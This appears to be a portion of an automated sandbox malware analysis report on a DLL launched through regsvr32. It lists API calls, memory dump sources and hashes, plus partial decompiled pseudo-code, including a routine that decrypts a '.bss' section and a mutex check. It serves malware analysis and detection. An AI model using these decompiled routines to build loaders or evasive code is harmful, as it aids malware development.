0x1800051b0
0x1800051b4
0x1800051be
0x1800051ca
0x1800051dc
0x1800051e2
0x1800051ec
0x1800051ee
0x1800051f7
0x1800051f9
0x18000520b
0x180005214
0x18000521e
0x180005224
0x18000522e
0x180005234
0x180005248
0x18000524e
0x18000526d
0x180005280
0x18000529f
0x1800052a5
0x1800052b6
0x1800052c0
0x1800052c5
0x1800052cc
0x1800052ce
0x1800052d2
0x1800052da
0x1800052de
0x1800052e2
0x1800052e5
0x1800052f6
0x1800052fd
0x180005302
0x18000530d
0x180005312
0x18000531c
0x180005323
0x18000532d
0x180005332
0x180005337
0x18000533f
0x180005346
0x18000534b
0x180005355
0x18000535f
0x180005367
0x18000536c
0x18000536e
0x180005374
0x180005378
0x18000537c
0x180005383
0x180005391
0x18000539c
0x1800053a7
0x1800053b4
0x1800053b7
0x1800053bc
0x1800053c4
0x1800053d3
0x1800053db
0x1800053ea
0x1800053ec
0x1800053f4
0x1800053f6
0x1800053fb
0x18000540d
0x180005412
0x180005417
0x18000543a

APIs

HeapAlloc.KERNEL32 ref: 00000001800050CB
memset.NTDLL ref: 00000001800050E8
InitializeCriticalSection.KERNEL32 ref: 00000001800050F1

Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B6B
Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B8B

Part of subcall function 0000000180007678: GetModuleHandleA.KERNEL32 ref: 00000001800076C7

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32 ref: 0000000180005150
HeapAlloc.KERNEL32 ref: 0000000180005171
RegOpenKeyW.ADVAPI32 ref: 00000001800051A5
RegEnumKeyW.ADVAPI32 ref: 00000001800051E2
RegCloseKey.KERNELBASE ref: 000000018000520B
HeapFree.KERNEL32 ref: 000000018000521E
memcpy.NTDLL ref: 000000018000524E
GetModuleHandleA.KERNEL32 ref: 0000000180005383
GetCurrentThreadId.KERNEL32 ref: 00000001800053A9

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
String ID:
API String ID: 2014251338-0
Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005CA4 Relevance: 7.6, APIs: 5, Instructions: 88
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateFileW.KERNELBASE ref: 0000000180005D04
RtlInitUnicodeString.NTDLL ref: 0000000180005D20
NtQueryDirectoryFile.NTDLL ref: 0000000180005D8C
CloseHandle.KERNEL32 ref: 0000000180005DC5
GetLastError.KERNEL32 ref: 0000000180005DCD

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
String ID:
API String ID: 2375947951-0
Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004F1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00000001180004F1C(void* __eax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
				intOrPtr _t23;
				intOrPtr _t24;
				int _t30;
				void* _t47;
				void* _t48;
				long long _t58;
				void* _t74;
				intOrPtr* _t77;
				intOrPtr* _t78;
				long long _t82;
				long long _t84;
				void* _t85;
				long long _t87;
				void* _t93;
				void* _t94;
				long _t95;
				long _t97;
				long _t99;

				_t94 = __r11;
				_t58 = _t87;
				 *((long long*)(_t58 + 8)) = __rbx;
				 *((long long*)(_t58 + 0x10)) = _t84;
				 *((long long*)(_t58 + 0x18)) = __rsi;
				 *((long long*)(_t58 + 0x20)) = __rdi;
				_t85 = __rcx;
				r8d = 0;
				HeapCreate(_t99, _t97, _t95); // executed
				_t82 = _t58;
				if (_t58 == 0) goto 0x8000506b;
				_t74 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t77 = _t58 + _t74 + 0x68;
				_t23 =  *_t77;
				if (_t23 == 0) goto 0x80004ffc;
				if (_t23 == 0x7373622e) goto 0x80004f8a;
				_t78 = _t77 + 0x28;
				_t24 =  *_t78;
				if (_t24 != 0) goto 0x80004f79;
				if (_t24 == 0) goto 0x80004ffc;
				r13d =  *(_t78 + 0x10);
				r12d =  *(_t78 + 0x14);
				r12d = r12d ^  *(_t74 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t58 == 0) goto 0x80004ff5;
				r9d = r12d;
				r8d = r13d;
				E00000001180002524(0,  *((intOrPtr*)(_t78 + 0xc)), _t58, __rbx, _t58, _t74 + __rcx, _t82);
				r11d =  *((intOrPtr*)(_t78 + 0xc));
				 *0x8000d490 = _t58 - _t94 - _t85;
				 *0x8000d498 = E00000001180001B48(0, 0x2a, _t58, 0x80011040, _t58 - _t94 - _t85 + 0x80011040);
				goto 0x80005001;
				goto 0x80005001;
				if (2 == 0) goto 0x80005010;
				HeapDestroy(??);
				goto 0x8000506b;
				HeapAlloc(??, ??, ??);
				if (0x80011040 != 0) goto 0x80005049;
				_t30 = HeapDestroy(??);
				goto 0x8000506b;
				0x8000236a();
				 *0x180011048 = _t82;
				 *0x8000d4a0 = 0x80011040;
				return E0000000118000508C(_t30, 0,  *0x8000d498, _t47, _t48, 0x80011040, 0x80011040, _t85, _t93);
			}

APIs

HeapCreate.KERNELBASE(?,?,?,000000018000134F), ref: 0000000180004F4B
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 0000000180004FA5
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 0000000180005008
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 000000018000502B
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 000000018000503C

Strings

.bss, xrefs: 0000000180004F79

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocDestroy$Create
String ID: .bss
API String ID: 388876957-3890483948
Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008708 Relevance: 6.1, APIs: 4, Instructions: 70
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00000001180008708(long long __rbx, intOrPtr* __rcx, void* _a8, char _a16, long long _a24) {
				void* _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				void* _t22;
				void* _t24;
				void* _t44;
				long long _t45;
				long long _t46;
				struct _SECURITY_ATTRIBUTES* _t55;
				long long _t58;
				int _t60;
				WCHAR* _t64;
				void* _t67;
				void* _t74;
				void* _t77;

				_t46 = __rbx;
				_t44 = _t67;
				 *((long long*)(_t44 + 8)) = __rbx;
				r9d = 0;
				 *((intOrPtr*)(_t44 - 0x48)) = 0x18;
				 *((intOrPtr*)(_t44 - 0x38)) = 0;
				0x800085dc(); // executed
				if (_t22 == 0) goto 0x800087f7;
				_a16 =  *__rcx;
				_t45 =  &_a24;
				r9d = 0;
				_v88 = _t45;
				_t24 = E000000011800030C8(__rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t77, _t74);
				if (_t45 == _t46) goto 0x800087f7;
				E0000000118000459C(_t24, 0x3ff22481,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t45 == _t46) goto 0x800087c0;
				CreateMutexW(_t55, _t60, _t64); // executed
				goto 0x800087c3;
				_t58 = _t46;
				if (_t58 == _t46) goto 0x800087e9;
				if (GetLastError() != 0xb7) goto 0x800087e0;
				FindCloseChangeNotification(??); // executed
				goto 0x800087e9;
				_a24 = _t58;
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

Part of subcall function 00000001800030C8: lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
Part of subcall function 00000001800030C8: HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000314B
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000317D

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateMutexW.KERNELBASE ref: 00000001800087B9
GetLastError.KERNEL32 ref: 00000001800087C8
FindCloseChangeNotification.KERNELBASE ref: 00000001800087D8
HeapFree.KERNEL32 ref: 00000001800087F1

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
String ID:
API String ID: 4170216436-0
Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007B94 Relevance: 4.6, APIs: 3, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocateHeapmemset
String ID:
API String ID: 669713250-0
Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002464 Relevance: 4.5, APIs: 3, Instructions: 30
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
				void* _t14;
				long long _t21;
				void* _t25;
				long long* _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __rdx; // executed
				LoadLibraryA(??); // executed
				_t25 = __rax;
				if (__rax == 0) goto 0x800024af;
				if (E00000001180007B94(_t14, __rbx, __rax,  &_a24, _t32, _t33, _t34, _t35) != 0) goto 0x800024a4;
				_t21 = _a24;
				 *_t21 = _t25;
				 *_t27 = _t21;
				goto 0x800024b7;
				FreeLibrary(??);
				goto 0x800024b7;
				return GetLastError();
			}

0x180002464
0x180002469
0x180002473
0x180002476
0x18000247c
0x180002482
0x180002495
0x180002497
0x18000249c
0x18000249f
0x1800024a2
0x1800024a7
0x1800024ad
0x1800024c8

APIs

LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF

Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Library$AllocateErrorFreeHeapLastLoadmemset
String ID:
API String ID: 105124555-0
Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006DCC Relevance: 3.8, APIs: 3, Instructions: 62
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00000001180006DCC(void* __edx, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
				int _t27;
				void* _t47;
				long long _t49;
				intOrPtr* _t64;
				long long _t66;
				intOrPtr* _t67;
				void* _t69;
				void* _t70;
				void* _t72;
				void* _t75;
				WCHAR* _t78;
				WCHAR* _t81;

				_t49 = __rbx;
				_t47 = _t69;
				 *((long long*)(_t47 + 8)) = __rbx;
				 *((long long*)(_t47 + 0x10)) = _t66;
				 *((long long*)(_t47 + 0x18)) = __rsi;
				 *((long long*)(_t47 + 0x20)) = __rdi;
				_t70 = _t69 - 0x30;
				_t64 = __rcx;
				_t67 = __rdx;
				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t72);
				if ( *0x8000d4a0 == _t49) goto 0x80006e8a;
				 *_t67 =  *_t64;
				if (lstrlenW(_t81) - 0xe <= 0) goto 0x80006e4f;
				_t27 = lstrcmpiW(_t78); // executed
				if (_t27 == 0) goto 0x80006e7a;
				E00000001180002594(0, _t49,  *0x8000d4a0,  *0x8000d490 + 0x180011240, _t64, _t70 + 0x20, _t75);
				r11d =  *((intOrPtr*)(_t70 + 0x20));
				 *_t67 =  *_t67 +  *((intOrPtr*)(_t70 + 0x24)) + r11d;
				 *((intOrPtr*)(_t67 + 4)) =  *((intOrPtr*)(_t67 + 4)) +  *((intOrPtr*)(_t70 + 0x28)) +  *((intOrPtr*)(_t70 + 0x2c));
				HeapFree(??, ??, ??);
				goto 0x80006e8f;
				return 8;
			}

APIs

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocFreelstrcmpilstrlen
String ID:
API String ID: 727816722-0
Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 01333EDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 01334064

Memory Dump Source

Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction ID: c2e1959adb1794658ea3beb8051a09547a3a9f913a7a858babd717707100de46
Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction Fuzzy Hash: AD617631718A8D8FD7A4DB2CC454766FBE1FBD8248FC48559E1CEC3651D625C889C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800025EC Relevance: 3.0, APIs: 2, Instructions: 14
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00000001800025F7
WaitForSingleObject.KERNEL32 ref: 0000000180002615

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ObjectSingleSleepWait
String ID:
API String ID: 309074506-0
Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700

Uniqueness

Uniqueness Score: -1.00%

Function 01333880 Relevance: 1.7, APIs: 1, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 01333A5F

Memory Dump Source

Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction ID: f07b47c6e03d4348a0a1fcead4c14b346447c9b3084d36ef9d004c5b8e4bb4c6
Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction Fuzzy Hash: 18513C70A68748DFE7A4DB2CC05876A7BE5FBC8349F84891DB18BC7650D3348885CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 01331C0B Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction ID: ef1abaabebf0f1625d49d68bed905a74c0ebbe169b2c354c901d1c4a15a1d74f
Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction Fuzzy Hash: A7417274A18B8C8FEB94EB2CC45877A7BE5FBD9308FC85519E186C3650D734D8808B4A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180006344 Relevance: 31.7, APIs: 21, Instructions: 220
memorystringsleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00000001180006344(void* __ecx, void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r11) {
				void* _t74;
				signed long long _t75;
				int _t92;
				void* _t93;
				signed long long _t94;
				void* _t106;
				signed long long _t107;
				signed long long _t116;
				void* _t161;
				long long _t163;
				long long _t164;
				long long _t165;
				long long _t207;
				CHAR* _t210;
				long long _t216;
				long long* _t218;
				void* _t220;
				void* _t221;
				CHAR* _t245;
				CHAR* _t248;
				struct _FILETIME* _t255;
				void* _t256;
				long _t258;
				long long _t259;

				_t161 = _t220;
				 *((long long*)(_t161 + 0x10)) = __rbx;
				 *((long long*)(_t161 + 0x18)) = _t216;
				 *((long long*)(_t161 + 0x20)) = __rsi;
				 *((long long*)(_t161 + 8)) = __rcx;
				_t221 = _t220 - 0x50;
				_t259 = __rcx;
				 *((long long*)(_t221 + 0x38)) =  *0x8000d490;
				_t163 =  *0x8000d4a0;
				_t6 =  &(_t210[0xa]); // 0xa
				r12d = r9d;
				_t256 = __r8;
				Sleep(_t258);
				GetSystemTimeAsFileTime(_t255);
				_t9 = _t221 + 0x30; // -78
				_t75 = E000000011800059FC(_t74, _t9);
				_t10 = _t221 + 0x30; // -78
				r11d = _t75;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				E000000011800066A8(__rbx, _t10, __rdx);
				 *((long long*)(_t221 + 0x40)) = _t163;
				if (_t163 == _t210) goto 0x8000667f;
				lstrlenA(_t248);
				lstrlenA(_t245);
				HeapAlloc(??, ??, ??);
				_t169 = _t163;
				if (_t163 == _t210) goto 0x80006671;
				lstrcpyA(_t210);
				if (__r8 == _t210) goto 0x80006456;
				if (r12d == 0) goto 0x80006456;
				_t164 =  *((intOrPtr*)(_t221 + 0x38));
				lstrcatA(??, ??);
				lstrcatA(??, ??);
				_t23 = _t221 + 0x48; // -54
				_t207 = _t163;
				if (E000000011800031D4(_t6, _t163, _t259, _t207,  *((intOrPtr*)(_t163 + 8)), __rdx, _t23) != 0) goto 0x80006663;
				_t218 =  *((intOrPtr*)(_t221 + 0xa0));
				 *_t218 =  *((intOrPtr*)(_t221 + 0x48));
				_t92 = lstrlenA(??);
				_t26 = _t207 + 0x34; // 0x34
				r8d = _t26;
				 *(_t218 + 0x10) = _t92;
				 *((intOrPtr*)(_t218 + 0x14)) = 1;
				_t93 = HeapAlloc(??, ??, ??);
				if (_t164 == _t210) goto 0x80006650;
				_t29 = _t221 + 0x30; // -78
				_t94 = E000000011800059FC(_t93, _t29);
				_t30 = _t221 + 0x30; // -78
				r11d = _t94;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				E000000011800066A8(_t163, _t30, _t207);
				 *((long long*)(_t221 + 0x48)) = _t164;
				if (_t164 == _t210) goto 0x80006642;
				0x8000a48e();
				HeapFree(??, ??, ??);
				 *((long long*)(_t218 + 8)) = _t164;
				if (_t256 == _t210) goto 0x8000669f;
				if (r12d == 0) goto 0x8000669f;
				_t165 = _t218 + 0x28;
				r8d = r12d;
				 *((long long*)(_t221 + 0x20)) = _t165;
				if (E00000001180001208(0, _t163,  *((intOrPtr*)(_t221 + 0x80)), _t256,  *((intOrPtr*)(_t163 + 8)), _t218, _t218 + 0x18) != 0) goto 0x80006642;
				r14d = 0x77;
				 *((intOrPtr*)(_t218 + 0x2c)) = 1;
				_t106 = HeapAlloc(??, ??, ??);
				if (_t165 == _t210) goto 0x80006642;
				_t48 = _t221 + 0x30; // -78
				_t107 = E000000011800059FC(_t106, _t48);
				_t49 = _t221 + 0x30; // -78
				r11d = _t107;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t116 = E000000011800066A8(_t169, _t49, _t256);
				 *((long long*)(_t221 + 0x48)) = _t165;
				if (_t165 == _t210) goto 0x80006634;
				0x8000a48e();
				r11d = _t116;
				r14d = r14d - r11d;
				 *((long long*)(_t221 + 0x20)) =  *((intOrPtr*)(_t221 + 0x38)) + 0x1800112af;
				0x8000a48e();
				 *((long long*)(_t218 + 0x20)) = _t165;
				HeapFree(??, ??, ??);
				goto 0x80006663;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return 2;
			}

0x180006344
0x180006347
0x18000634b
0x18000634f
0x180006353
0x180006360
0x18000636b
0x180006370
0x180006375
0x18000637c
0x180006383
0x180006386
0x18000638c
0x180006397
0x18000639d
0x1800063a2
0x1800063a7
0x1800063ac
0x1800063c6
0x1800063cd
0x1800063d5
0x1800063dd
0x1800063e6
0x1800063f2
0x180006405
0x18000640b
0x180006411
0x18000641d
0x18000642d
0x180006432
0x180006434
0x180006444
0x180006450
0x180006456
0x18000645b
0x180006468
0x180006473
0x18000647e
0x180006482
0x18000648d
0x18000648d
0x180006491
0x180006494
0x18000649b
0x1800064a7
0x1800064ad
0x1800064b2
0x1800064b7
0x1800064bc
0x1800064d6
0x1800064dd
0x1800064e2
0x1800064ea
0x18000650f
0x18000651e
0x180006524
0x18000652b
0x180006534
0x180006542
0x18000654a
0x180006550
0x18000655c
0x180006562
0x180006570
0x180006577
